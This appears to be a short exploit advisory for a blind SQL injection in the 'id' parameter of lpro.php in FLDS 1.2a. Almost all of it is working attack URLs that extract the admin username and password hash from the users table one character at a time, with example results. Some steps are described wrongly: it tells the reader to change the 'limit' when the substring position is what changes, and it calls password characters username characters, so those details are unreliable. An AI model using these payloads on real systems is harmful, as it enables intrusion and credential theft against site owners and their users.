#########################################################################################################################
[+] FLDS 1.2a lpro.php (id) Blind SQL Injection Vulnerability
[+] Discovered By SirGod
[+] Greetz : All my friends
#########################################################################################################################

[+] Blind SQL Injection

- Get username :

     http://[target]/[path]/lpro.php?id=1 and ascii(substring((SELECT
username from users limit 0,1),1,1))>96

  Query is true(page loads normally).Going to next ascii char.

     http://[target]/[path]/lpro.php?id=1 and ascii(substring((SELECT
username from users limit 0,1),1,1))>97

  Query is false, first char of username is ascii(97) which is "a"

Then move to next char of the username.Change the limit 1,1 to 2,1

     http://[target]/[path]/lpro.php?id=1 and ascii(substring((SELECT
username from users limit 0,1),2,1))>99

   Query is true(page loads normally).Going to next ascii char.

     http://[target]/[path]/lpro.php?id=1 and ascii(substring((SELECT
username from users limit 0,1),2,1))>100

   Query is false,second char of username is ascii(100) which is "d"

And so on ... change the limit : 1,1 then 2,1 then 3,1 ...  Username
is : admin (Example)

- Get password (hash) :

    http://[target]/[path]/lpro.php?id=1 and ascii(substring((SELECT
password from users limit 0,1),1,1))>49

  Query is true(page loads normally).Going to next ascii char.

    http://[target]/[path]/lpro.php?id=1 and ascii(substring((SELECT
password from users limit 0,1),1,1))>50

  Query is false, first char of username is ascii(50) which is "2" .

Then move to next char of the password hash.Change the limit 1,1 to 2,1

    http://[target]/[path]/lpro.php?id=1 and ascii(substring((SELECT
password from users limit 0,1),2,1))>48

  Query is true(page loads normally).Going to next ascii char.
	
    http://[target]/[path]/lpro.php?id=1 and ascii(substring((SELECT
password from users limit 0,1),2,1))>49

  Query is false, first char of username is ascii(49) which is "1"

And so on ... change the limit : 1,1 then 2,1 then 3,1 ... Password
hash is : 21232f297a57a5a743894a0e4a801fc3 (Example)

#########################################################################################################################